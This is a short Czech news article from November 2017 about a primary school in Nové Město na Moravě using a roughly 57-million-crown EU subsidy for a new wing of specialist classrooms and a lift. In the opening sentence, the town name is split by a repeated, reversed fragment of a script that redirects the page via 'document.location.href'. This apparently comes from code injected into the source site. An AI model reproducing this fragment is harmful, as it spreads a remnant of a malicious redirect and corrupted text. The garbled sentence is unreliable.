Rainbow page separator

Škola využije sedmapadesát dotačních milionů na přestavbu

Čtvrtek, 9. listopadu 2017

Peníze, papírové bankovky

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Novou přístavbu se specializovanými učebnami se chystají nechat vybudovat v novoměstské základní škole na Vratislavově náměstí. Financování stavby pomůže evropská dotace ve výši přibližně 57 milionů korun.
V základní škole bude vybudováno a vybaveno šest nových odborných učeben pro výuku přírodopisu, fyziky, zeměpisu a cizích jazyků, pět kabinetů a zázemí pro učitele, což zabere nové patro nad školní jídelnou, které se propojí s hlavní budovou.
Projekt zahrne také modernizaci stávajících odborných pracoven v hlavní školní budově, jinak bude vypadat i školní dvůr, kde vzniknou dílny pro žáky a relaxační zóna. Součástí projektu je rovněž vybudování výtahu, čímž bude zajištěna bezbariérovost školní budovy, která byla postavena v roce 1878.